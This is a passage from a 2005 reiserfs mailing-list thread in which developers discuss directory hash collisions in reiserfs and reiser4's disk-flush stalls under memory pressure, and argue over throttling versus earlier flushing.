>easily to create filename holes in the filesystem that even root cannot
>override.
>
>
It should be a weighty reason to use strong hash function for creating
entries because
stable hash means bad performance and more occupied place in stat-data:
I am not
sure that even 160 bit will guarantee absence of collision for a long time..
Edward.
>Thanks for the suggestion, though! However, the workaround I currently use
>(delete the dir, reinstall) works better, as it doesn't destroy debian's
>idea of the filesystem layout.
>
>
>
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 16:26 ` Chris Dukes
2005-01-06 16:29 ` Spam
@ 2005-01-07 17:22 ` Hans Reiser
2005-01-07 17:28 ` Chris Dukes
2005-01-07 23:27 ` flush earlier? (was Re: Congratulations! we have got hash function screwed up) David Masover
1 sibling, 2 replies; 26+ messages in thread
From: Hans Reiser @ 2005-01-07 17:22 UTC (permalink / raw)
To: Chris Dukes; +Cc: Spam, reiserfs-list
Chris Dukes wrote:
>
>
>All filesystems will fail or suffer degraded performance under
>certain conditions, you need to determine what conditions are acceptable
>for your data.
>
>
>
and each generation of software reduces the extent of such conditions.
Reiser4 fixes this problem cleanly.
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-06 18:55 ` Congratulations! we have got hash function screwed up Edward Shishkin
@ 2005-01-07 17:26 ` Lehmann
0 siblings, 0 replies; 26+ messages in thread
From: Lehmann @ 2005-01-07 17:26 UTC (permalink / raw)
To: Edward Shishkin; +Cc: Alex Zarochentsev, reiserfs-list, stefan
On Thu, Jan 06, 2005 at 09:55:20PM +0300, Edward Shishkin <edward@namesys.com> wrote:
> >On Thu, Jan 06, 2005 at 03:45:06PM +0300, Alex Zarochentsev
> ><zam@namesys.com> wrote:
> >>>
> >>Tea hash is designed to be more resistant.
> >>
> >>
>
> Actually this can not be more resistant as it use the same 32-bit output
> size.
Sure it can, filenames are not randomly distributed, so your argument doesn't
suffice to show that tea cannot be more resistent, as it could be more
resistent for other reasons.
That's why I originally wrote "nicely-looking", which (if it wasn't clear)
was meant to say that filenames with somewhat similar names do collide
even with tea, which suppossedly was chosen to avoid this case.
> So to find a collision you just need to find hashes of 2^16 = 65536
> random documents.
True. It's even worse if these collisions happen to filenames occuring in
practise.
(I also agree to the rest of your mail)
--
The choice of a
-----==- _GNU_
----==-- _ generation Marc Lehmann
---==---(_)__ __ ____ __ pcg@goof.com
--==---/ / _ \/ // /\ \/ / http://schmorp.de/
-=====/_/_//_/\_,_/ /_/\_\ XX11-RIPE
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Congratulations! we have got hash function screwed up
2005-01-07 17:22 ` Hans Reiser
@ 2005-01-07 17:28 ` Chris Dukes
2005-01-07 23:27 ` flush earlier? (was Re: Congratulations! we have got hash function screwed up) David Masover
1 sibling, 0 replies; 26+ messages in thread
From: Chris Dukes @ 2005-01-07 17:28 UTC (permalink / raw)
To: Hans Reiser; +Cc: Spam, reiserfs-list
On Fri, Jan 07, 2005 at 09:22:02AM -0800, Hans Reiser wrote:
> Chris Dukes wrote:
>
> >
> >
> >All filesystems will fail or suffer degraded performance under
> >certain conditions, you need to determine what conditions are acceptable
> >for your data.
> >
> >
> >
> and each generation of software reduces the extent of such conditions.
> Reiser4 fixes this problem cleanly.
Should reduce. I currently have the misfortune of supporting
some software that seems to be of the "For every bug fixed atleast
one bug with an equal level of impact is introduced" variety.
--
Chris Dukes
hello stacklimit my old friend, I've come to visit you again
^ permalink raw reply [flat|nested] 26+ messages in thread
* flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-07 17:22 ` Hans Reiser
2005-01-07 17:28 ` Chris Dukes
@ 2005-01-07 23:27 ` David Masover
2005-01-07 23:52 ` Hans Reiser
1 sibling, 1 reply; 26+ messages in thread
From: David Masover @ 2005-01-07 23:27 UTC (permalink / raw)
To: Hans Reiser; +Cc: Chris Dukes, Spam, reiserfs-list
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hans Reiser wrote:
| Chris Dukes wrote:
|
|>
|>
|> All filesystems will fail or suffer degraded performance under
|> certain conditions, you need to determine what conditions are acceptable
|> for your data.
|>
|>
|>
| and each generation of software reduces the extent of such conditions.
| Reiser4 fixes this problem cleanly.
I think Reiser4's degraded performance condition is when it gets lots of
RAM. First, a disclaimer -- I don't have the latest reiser4 patch. But
in all versions of the FS, I've found that if I'm ever trying to do
anything when reiser finally decides to flush to disk, basically my
whole system is locked up. I haven't tested, but I think this would
actually be worse with more RAM, because it would be longer until the
flush was forced, so each flush would take longer.
What is needed is some sort of estimator or estimate. An estimator
would be something that would flush when, based on recent fs load, it
was reasonable to expect that RAM would fill up just as the flush was
completing. An estimate would be to flush if a certain percentage of
RAM was full, and to go to synchronous mode if memory usage didn't go
back below that percentage.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iQIVAwUBQd8a4HgHNmZLgCUhAQKb+A//fps5uIUtnfrHGe0y3itGbggWGkDqV80O
MPlLDqmlyMRWAGij5f5F345OU7GBi7VVCkgXMJbemO7TJ82Yr8OQXPO1Ywrt1rL5
bdPej6rZD7RW7+2DRlT78XdvP2ZbqKQNjvIlmLvQIziGk2BfGxwzxt1P5vztIvfE
HtqiP9ImSbxFkjRjZmdeQC8koyEK0vqYeasRma2pC1ZsABXxRHdRPnm/OT1gZc5D
YAYqyHCcs+RFr6+KYs9TSh4H5pNcHq1kYUEcoNFI0ubMSnNK+DvlrhBPhi5fkxPT
8D86nvphYFn7gKob1A9DZzKQz0qFcbhY35KW8g4hwHUrAyQWQtOU5sh+eIF0hV+j
LRhI6Ao6lgSAyq/GuxVwZ64emiM70JvoRNDLt4YVs4VDWnTcarhUNCikEUjvSCqj
Ux2RWI+6YILFso1D0Zl+4J0hkSxZPurzvRGL9TWT3Gwkdlyfk77jRbgfvZ5oy2aC
Q4gv5h/j+7AngfzlYY8n20zlocGoW8GEpaSgWa4VimTwAuHYEoDMu0TdlHLZzMB6
u2CBoYy7brCaxUpaV7np5E/rfEPcccINVgea0/dVhvkVGjyMQHb8msyX1r4IXRRC
jVxP2veoyxsyTTmcOCAViF6Epe4fVIhTnafH7hVmcWEk0Vt+aHSbAJtYK9oFTz7E
RX0WHi9z4fs=
=UeYu
-----END PGP SIGNATURE-----
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-07 23:27 ` flush earlier? (was Re: Congratulations! we have got hash function screwed up) David Masover
@ 2005-01-07 23:52 ` Hans Reiser
2005-01-08 5:03 ` David Masover
0 siblings, 1 reply; 26+ messages in thread
From: Hans Reiser @ 2005-01-07 23:52 UTC (permalink / raw)
To: David Masover; +Cc: Chris Dukes, Spam, reiserfs-list
David Masover wrote:
> Hans Reiser wrote:
> | Chris Dukes wrote:
> |
> |>
> |>
> |> All filesystems will fail or suffer degraded performance under
> |> certain conditions, you need to determine what conditions are
> acceptable
> |> for your data.
> |>
> |>
> |>
> | and each generation of software reduces the extent of such conditions.
> | Reiser4 fixes this problem cleanly.
>
> I think Reiser4's degraded performance condition is when it gets lots of
> RAM. First, a disclaimer -- I don't have the latest reiser4 patch. But
> in all versions of the FS, I've found that if I'm ever trying to do
> anything when reiser finally decides to flush to disk, basically my
> whole system is locked up. I haven't tested, but I think this would
> actually be worse with more RAM, because it would be longer until the
> flush was forced, so each flush would take longer.
>
> What is needed is some sort of estimator or estimate. An estimator
> would be something that would flush when, based on recent fs load, it
> was reasonable to expect that RAM would fill up just as the flush was
> completing. An estimate would be to flush if a certain percentage of
> RAM was full, and to go to synchronous mode if memory usage didn't go
> back below that percentage.
We need to throttle rather than flush, so as to ensure that for every
page added to an atom, at least X pages must reach disk, until close to
the end of the atom when we just flush it out.
Another missing and needed feature....
Hans
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-07 23:52 ` Hans Reiser
@ 2005-01-08 5:03 ` David Masover
2005-01-08 20:48 ` Hans Reiser
0 siblings, 1 reply; 26+ messages in thread
From: David Masover @ 2005-01-08 5:03 UTC (permalink / raw)
To: Hans Reiser; +Cc: Chris Dukes, Spam, reiserfs-list
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hans Reiser wrote:
| David Masover wrote:
|
|> Hans Reiser wrote:
|> | Chris Dukes wrote:
|> |
|> |>
|> |>
|> |> All filesystems will fail or suffer degraded performance under
|> |> certain conditions, you need to determine what conditions are
|> acceptable
|> |> for your data.
|> |>
|> |>
|> |>
|> | and each generation of software reduces the extent of such conditions.
|> | Reiser4 fixes this problem cleanly.
|>
|> I think Reiser4's degraded performance condition is when it gets lots of
|> RAM. First, a disclaimer -- I don't have the latest reiser4 patch. But
|> in all versions of the FS, I've found that if I'm ever trying to do
|> anything when reiser finally decides to flush to disk, basically my
|> whole system is locked up. I haven't tested, but I think this would
|> actually be worse with more RAM, because it would be longer until the
|> flush was forced, so each flush would take longer.
|>
|> What is needed is some sort of estimator or estimate. An estimator
|> would be something that would flush when, based on recent fs load, it
|> was reasonable to expect that RAM would fill up just as the flush was
|> completing. An estimate would be to flush if a certain percentage of
|> RAM was full, and to go to synchronous mode if memory usage didn't go
|> back below that percentage.
|
|
| We need to throttle rather than flush, so as to ensure that for every
| page added to an atom, at least X pages must reach disk, until close to
| the end of the atom when we just flush it out.
I'm not sure I understand that. Is the idea of that to build up a write
buffer which insists on flushing bytes off the front as they are added
onto the back, without flushing huge chunks at once?
Would that be as efficient at packing (no fragmentation)?
But the main problem was it would basically lock the fs entirely -- no
access at all. This especially hurts with read access. When fs is
under heavy load, I can wait several minutes to start a browser,
especially when a lot of writing is happening.
For now, how about a quick fix. Can we force a flush when we get to
80%? Is there a synchronous mode, and can we use that after 80%, or do
we have to fake it by trying to flush every few seconds?
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iQIVAwUBQd9pm3gHNmZLgCUhAQLj6BAAnzjp7PNnNr952pOg1LLckELJbG0Cq/Kj
smMR5VknCSeM0ho30gnjWOzI9FE/O1nAk6sMEdEcX6MGwCB8KUeQLo2OebIQCMi2
PdzB+nh6VImqeOZkgccBMQL6OK7o8QHYhQ/QtqBQ+3UIXTuJdBG4YZjNAkYDXF3s
ObJcLDKwaN3yZCzrLmcpK2+BQSckBu797Z3mwnbj1jpOiki76BqCrMCI7+081V/j
A4aOBeSQwKXfsld4vdIbWZzKF2lpUGx1jzfynYMVfQ9sj/aqtpKMbwDWiUOBdSv+
OX01ARcU1O90ZdL+zjT6qhJXgXOjbZu5Tpp9slJaYuvSbv516DJn2l1A+ADlbEkk
fxEHx2RRT0rqtepiBKu+QsGrO3ixl4lGZtyx4d8cj/yRjbHtNNI0YYg5w1kJ+udE
H93Y3JpdJi6iBdKvblJpRW1bA/HR9g+p/PsQy6jdwcKthzjTvFwXjSfGCy0u+nF7
mKry8Axd3QiANs4x8Pc6CDdbFEiPjo4FVpfBASb5qq7TbQVSSpvzEoWPn5AE5xE9
ZBuHireWoGG5XzwxkhfS14Y6letoKx1tbkZHSULwlTdmNffxIXDf0cc//G4H8waU
T3T8FOHQZtK+lnAMD7ImeNInJlPKde90JGYUg1YGeVcJqgfvroc+Ke0F4YTlhKi6
zaj+QkeKf7Q=
=ev3/
-----END PGP SIGNATURE-----
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-08 5:03 ` David Masover
@ 2005-01-08 20:48 ` Hans Reiser
2005-01-09 23:26 ` David Masover
0 siblings, 1 reply; 26+ messages in thread
From: Hans Reiser @ 2005-01-08 20:48 UTC (permalink / raw)
To: David Masover; +Cc: Chris Dukes, Spam, reiserfs-list
David Masover wrote:
>
>
> Hans Reiser wrote:
> | David Masover wrote:
> |
> |> Hans Reiser wrote:
> |> | Chris Dukes wrote:
> |> |
> |> |>
> |> |>
> |> |> All filesystems will fail or suffer degraded performance under
> |> |> certain conditions, you need to determine what conditions are
> |> acceptable
> |> |> for your data.
> |> |>
> |> |>
> |> |>
> |> | and each generation of software reduces the extent of such
> conditions.
> |> | Reiser4 fixes this problem cleanly.
> |>
> |> I think Reiser4's degraded performance condition is when it gets
> lots of
> |> RAM. First, a disclaimer -- I don't have the latest reiser4
> patch. But
> |> in all versions of the FS, I've found that if I'm ever trying to do
> |> anything when reiser finally decides to flush to disk, basically my
> |> whole system is locked up. I haven't tested, but I think this would
> |> actually be worse with more RAM, because it would be longer until the
> |> flush was forced, so each flush would take longer.
> |>
> |> What is needed is some sort of estimator or estimate. An estimator
> |> would be something that would flush when, based on recent fs load, it
> |> was reasonable to expect that RAM would fill up just as the flush was
> |> completing. An estimate would be to flush if a certain percentage of
> |> RAM was full, and to go to synchronous mode if memory usage didn't go
> |> back below that percentage.
> |
> |
> | We need to throttle rather than flush, so as to ensure that for every
> | page added to an atom, at least X pages must reach disk, until close to
> | the end of the atom when we just flush it out.
>
> I'm not sure I understand that. Is the idea of that to build up a write
> buffer which insists on flushing bytes off the front as they are added
> onto the back, without flushing huge chunks at once?
Yes.
>
> Would that be as efficient at packing (no fragmentation)?
No.
>
> But the main problem was it would basically lock the fs entirely -- no
> access at all.
Which is why we need to allow fusing a little bit.
> This especially hurts with read access.
Read access? Do you have one CPU? Maybe the problem isn't what I
thought it was.
> When fs is
> under heavy load, I can wait several minutes to start a browser,
> especially when a lot of writing is happening.
>
> For now, how about a quick fix. Can we force a flush when we get to
> 80%?
VM already has an asynchronous flush mechanism. We just need to clean
up our interaction with it a bit to smooth things out.
> Is there a synchronous mode, and can we use that after 80%, or do
> we have to fake it by trying to flush every few seconds?
>
^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: flush earlier? (was Re: Congratulations! we have got hash function screwed up)
2005-01-08 20:48 ` Hans Reiser
@ 2005-01-09 23:26 ` David Masover
0 siblings, 0 replies; 26+ messages in thread
From: David Masover @ 2005-01-09 23:26 UTC (permalink / raw)
To: Hans Reiser; +Cc: Chris Dukes, Spam, reiserfs-list
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Hans Reiser wrote:
[...]
|> I'm not sure I understand that. Is the idea of that to build up a write
|> buffer which insists on flushing bytes off the front as they are added
|> onto the back, without flushing huge chunks at once?
|
|
| Yes.
|
|>
|> Would that be as efficient at packing (no fragmentation)?
|
|
| No.
Really? I'd think that it would waste more CPU, but you could actually
end up packing better, if you allocate for the end of the buffer as it's
flushed, because you can look at the whole buffer and what's already on
disk. What would be a good idea with one flush could be inefficient by
the next, and this system can react faster to that change.
But, there's still laptops, and there's CPU usage.
Will it be hard to implement both approaches? One example would be
someone trying to create a clean fs "image", or someone who's installing
software, so they don't care how long it takes, but they do want it to
be tightly packed. Someone who can't afford the repacker :(
|> But the main problem was it would basically lock the fs entirely -- no
|> access at all.
|
|
| Which is why we need to allow fusing a little bit.
What do you mean by "fusing" here?
|> This especially hurts with read access.
|
|
| Read access? Do you have one CPU? Maybe the problem isn't what I
| thought it was.
Yes, I have one CPU. But I only have one reiser4 drive per machine. I
think that reiser4 locks all fs access until the flush is done, or at
least it used to. But even if it didn't, reads take _forever_ when the
disk is in use, and reads are usually more urgent than writes (hence
asynchronous writes). And the disk will be in use trying to write a
huge chunk of data for some time, and will take longer the more RAM you
have.
|> For now, how about a quick fix. Can we force a flush when we get to
|> 80%?
|
|
| VM already has an asynchronous flush mechanism. We just need to clean
| up our interaction with it a bit to smooth things out.
What I want to avoid is doing away with lazy writes entirely (laptops)
and doing something like ext3's "flush every five seconds" concept. But
I also want to avoid truly _massive_ spikes in disk activity.
That's what the 80% is about. You still get lazy writes, but they can
be at a lower priority than reads, hopefully minimizing seeks, too --
thrashing between reading and writing. But when the lazy write happens,
you don't slow down the rest of the system, because it still has some
room to write.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iQIVAwUBQeG9l3gHNmZLgCUhAQJFqQ/9FH9OVdTEM3DLCfRef0Xc6N+ZA4Wv4kCp
T1W4OHbxq3AL31TcLv5hRDA8xhv3ivp/ODQfcGNyM2mg2UcV61xwHWxvUwQmBTPG
0Nl2o4uM51LuoqW4V1OoVPD4sSr/Ak08ahyeG1vZY5T5kpLk+V6Ms6jklRrQqTDZ
r6PgBvDyw7C9JVuX911MMIzOJpDjx2vJavJZu0C4M/X2k9Tl2A99O2gpLB3Vuvcn
kCKEctXb6K+bt+kiFrnsMl4tqBhrc6fYMSQq+ZP4uU1Ttzxz1T59lT+gtMf2yqZL
hUZgMZ/DNpEdyzU7QOTMFOHFr5l73D4YainEJ7XP9zHzMf4tkHEwUiE3/H7/0ktD
FIqAnJ7khiDwC9r/yqAliecqWg+fspvyLy85aVsmG/5RWbEMYHhyxM4e+vEM5EMs
5dJ1XpSuoVrujiKFx2h/5drQ4KFui9bplbfoSahEsFpdcJ+MtNYHvNOqJ5l2ZLfe
s75j4DtsbWTXK/tGFRmIcL8gPzlUszfXrRVtQw+bhIxAtxmoABuqbCMYDd9LyclO
Kyzy0Ha0AYQy5pIFwm5cTCkC7GBThLBzPk7863J4jxHJ23izg5B/IyEEhOk9NOx2
jC3zf6ZwD1nEIWbZ/yH4s2J8kXw/wno92GLwxI5hpPFPqZxxGMG7xeND1vhcHBvF
1fozX/nMpN4=
=puoc
-----END PGP SIGNATURE-----
^ permalink raw reply [flat|nested] 26+ messages in thread
end of thread, other threads:[~2005-01-09 23:26 UTC | newest]
Thread overview: 26+ messages (download: mbox.gz follow: Atom feed
-- links below jump to the message on this page --
2004-12-28 22:12 Congratulations! we have got hash function screwed up Lehmann
2004-12-29 18:55 ` Stefan Traby
2004-12-29 21:04 ` Lehmann
2004-12-29 21:05 ` Hans Reiser
2004-12-29 21:43 ` Lehmann
2004-12-29 21:46 ` Christian Iversen
2004-12-29 22:27 ` Lehmann
2004-12-30 2:05 ` Hans Reiser
2004-12-30 10:22 ` Matthias Andree
2004-12-30 17:02 ` Lehmann
2005-01-06 12:45 ` Alex Zarochentsev
2005-01-06 14:27 ` Lehmann
2005-01-06 15:56 ` Hans Reiser
2005-01-06 16:13 ` Spam
2005-01-06 16:26 ` Chris Dukes
2005-01-06 16:29 ` Spam
2005-01-06 16:56 ` Chris Dukes
2005-01-07 17:22 ` Hans Reiser
2005-01-07 17:28 ` Chris Dukes
2005-01-07 23:27 ` flush earlier? (was Re: Congratulations! we have got hash function screwed up) David Masover
2005-01-07 23:52 ` Hans Reiser
2005-01-08 5:03 ` David Masover
2005-01-08 20:48 ` Hans Reiser
2005-01-09 23:26 ` David Masover
2005-01-06 18:55 ` Congratulations! we have got hash function screwed up Edward Shishkin
2005-01-07 17:26 ` Lehmann
This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.